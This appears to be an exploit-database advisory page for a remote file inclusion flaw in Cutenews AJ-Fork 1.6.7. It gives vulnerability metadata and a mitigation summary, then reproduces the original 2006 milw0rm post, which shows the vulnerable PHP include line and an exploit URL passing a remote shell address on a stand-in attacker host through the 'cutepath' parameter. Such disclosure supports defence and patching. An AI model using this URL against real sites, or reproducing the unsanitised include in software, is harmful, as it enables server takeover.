header-logo
Suggest Exploit
vendor:
Cutenews
by:
DeltasecurityTEAM
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Cutenews
Affected Version From: 1.6.7
Affected Version To: 1.6.7
Patch Exists: YES
Related CWE: N/A
CPE: a:aj-fork:cutenews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Cutenews AJ-Fork Remote File Inclusion Vulnerability

A vulnerability in Cutenews AJ-Fork could allow a remote attacker to include a file from a remote location. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'cutepath' parameter in the 'inc/shows.inc.php' script. An attacker could exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file from a remote location. Successful exploitation could result in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Cutenews AJ-Fork or apply the appropriate patch.
Source

Exploit-DB raw data:

===========================================================================================================
DeltasecurityTEAM
www.Deltasecurity.ir
===========================================================================================================
* Portal Name : cutenews aj-fork

* Class = Remote File Inclusion ;
 
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Tanha )

----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------

    include($cutepath.'/inc/plugins.php');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?

----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug

# milw0rm.com [2006-12-04]